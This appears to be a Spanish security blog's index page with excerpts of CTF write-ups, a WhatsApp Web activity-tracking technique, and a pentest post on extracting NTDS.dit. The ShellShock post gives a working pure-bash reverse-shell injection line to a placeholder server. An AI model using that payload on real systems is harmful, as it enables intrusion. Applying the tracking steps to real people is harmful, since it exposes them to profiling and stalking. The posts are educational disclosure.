2

Soluciones para n00bsCTFLabs de Infosecinstitute

In this post I will write my solutions to the n00bsCTF that InfosecInstitute made. I guess I should post this write-up in english language in order to participate for the bounty :P , nevertheless i’ve decided to write it in spanish because in Mexico there is a lot of young people trying to begin a career in infosec field, and I think this could help them. So…here we go.

 

Nivel 1.

Nos aparecía una imagen de Yoda con la leyenda “May the source be with you

1

El primer nivel debería ser algo sumamente sencillo. Y en la frase debería estar la clave. Si uno es fan de Star-Wars vería que hay algo raro en la frase. Podemos ver esa diferencia comparando la frase original con la frase que dice aquí.

1_1

Vemos que la clave esta en la “fuente“, pudiendo referirse al “código fuente“. Podemos ver el código fuente de la página web (Ctrl+U en Chrome)

1_sourcecode

Y en la primera línea tenemos la respuesta.

Flag: infosec_flagis_welcome.

 

Nivel 2.

Continue Reading

0

Perfilando y rastreando las “últimas acciones” de un usuario en Whatsapp Web

Con la llegada de Whatsapp Web, nos llega un nuevo artefacto que nos permite seguir “rastreando” la actividad de un usuario en Whatsapp. La otra vez navegando y estando de curioso (no, no andaba de stalker :P ) en el portal de Whatsapp Web, me percate de una nueva “fecha de ultima acción” que podemos obtener… Por lo que por ahora podemos:

 

1) Obtener fecha de última vez que se actualizó el “estado”.

Status_timestamp

 

2) Obtener fecha de ultima conexión.

Last_connection

 

3) Obtener fecha de cuando se agrego foto de perfil.

Esto es lo nuevo que encontré, cuando estaba en Whatsapp Web, vi las imágenes (que se ven en un tamaño bastante considerable :D ) y la URL se formaba de esta manera:

https://web.whatsapp.com/pp?t=l&u=5215500000000%40c.us&i=1423015939

Donde:

  • &u=5215500000000  Es el parámetro donde se define la LADA y el numero de celular.
  • &i=1423015939  Es el timestamp en epoch.

De esta forma, solo obtenemos el timestamp y lo decodificamos:

epoch_decode

 

Así podemos saber que el usuario César:

  • Se conecto por última vez el: 09/Marzo/15 21:16
  • Actualizó su estado por última vez el: 2/Enero/15
  • Y subió su foto de perfil el: 03/Febereo/15 20:12:19

Podríamos hacer otras cosas como:

  • Bajar la imagen y buscarla en un buscador inverso de imágenes
  • Si se tiene al usuario en alguna red social, buscar la imagen y comparar metadata
  • Hacer “image forensics” para saber si la imagen fue editada
  • Etc…

Aunque se ve que es poco lo que se obtuvo, todo eso se junta con más análisis de otras redes sociales y un poco de google hacking, y se obtienen perfilaciones muy buenas de gente. Tengo por ahí otros truquillos de otras redes sociales y aplicaciones, pero eso lo hablaremos en otra ocasión ;)

Todo esto, como artefactos “forenses” o de investigación es genial, no lo useis con fines de “stalkear” a la gente u otras cosas enfermas.

 

¡Saludos! ;)

1

ShellShock# Pure Bash Reverse Shell – PoC

Como hay un ¡BOOM! ahorita, con el Bug CVE-2014-6271 o mejor denominado #ShellShock #BashBleed etc… Decidi poner mi granito de arena, ya todo mundo explico que es, y como se esta explotando y buscando servers vulnerables (Lo puedes hacer con w3af, nmap, etc…)

Despues de encontrarlos se esta tratando de descargar codigos para hacer una conexión remota y obtener asi una shell…Yo me enfocare en crear la conexión remota, sin descargar nada.

De manera muy rápida veamos la vulnerabilidad.

Puedo declarar una función en una variable de entorno en bash y todo bien =)

0_Function

Posteriormente puedo ejecutar un comando y todo bien.

1_env

El problema radica, cuando ingreso comandos dentro de la declaración es son ejecutados.

2_test

Esa cadena esta siendo ejecutada dentro de la variable después de la declaración de la función y eso no debería pasar.

 

PoC

¿Manera de explotarlo? Mucha gente esta adjuntando la declaración de la función y comandos en la cabecera de User-Agent o Cookie, a aplicaciones con scripts CGI y si es vulnerable, ejecutara sus comandos.

Lo normal entonces seria tratar de hacer una conexión remota y obtener una shell, para esto la gente está inyectando código que:

  • Carga código que me permite conectarme remotamente
  • Crea un listener con NetCat ¿Pero si el server no tiene netcat?
  • Infinidad de cosas que se ocurran.

 

Para evitar hacer todo esto, podemos simplemente inyectar código que me cree la conexión y aquí es donde se me ocurre hacer uso de este comando que me crea una shell inversa con comandos puros de bash, que todo bash tiene.

Primero creare un Listener en mi equipo.

3_netcatDespues inyectare la shell:

env x='() { :;}; exec 6<>/dev/tcp/server/port;cat 0<&6 |while read i;do $i 2>&6 1>&6;done’

shell

Y vere que ya puedo ejecutar comandos =)
pwned

Hacer este tipo de rever shell con puro bash lo aprendi de GNUCITIZEN

Saludos ;)

 

3

Bugtraq Cyber Game – Write up

Este post decidí escribirlo en español, así que ahí vamos.

Recientemente participé en el Bugtraq Cyber Gameeste CTF que consistía en 13 retos se dividía en 6 categorías:

  • Web
  • Esteganografia
  • BruteForce
  • Phreaking
  • Criptografía
  • Cracking
  • Y un nivel Extra

bugtraq

De los 13 pude resolver 10, siendo así Cripto2, Stegano2 y Cracking2 los que no pude resolver.

Web 1 Continue Reading

7

Extracting NTDS.dit from a live Domain Controller “The easy way”

Neobits.org is back in the game (read more about), and for my first post in this new neobits.org era, I want to share a simple technique I used last week.

This month, has been so amazing for me:

  • I got my “The Art of Memory Forensics” book.
  • I recovered Neobits.org.
  • Was my 22nd Birthday u.u
  • I officially completed my first pentest for a company.

First of all, I want to thank my friend @Dash for the guidelines, advices, tips and by mentoring me during my first pentest, It has been an amazing experience, and I liked a lot. You are as our security folks named you: “The Messi from hacking in Aztec land”.

During this pentest we were able to hack all of our targets, including the Domain Controller (DC) =) but… now what?

Let’s get this precious file… NTDS.dit. For the readers who don’t know what this file is used for, let me tell you that in this file are contained all the password hashes of the users at the Domain Controller.

Continue Reading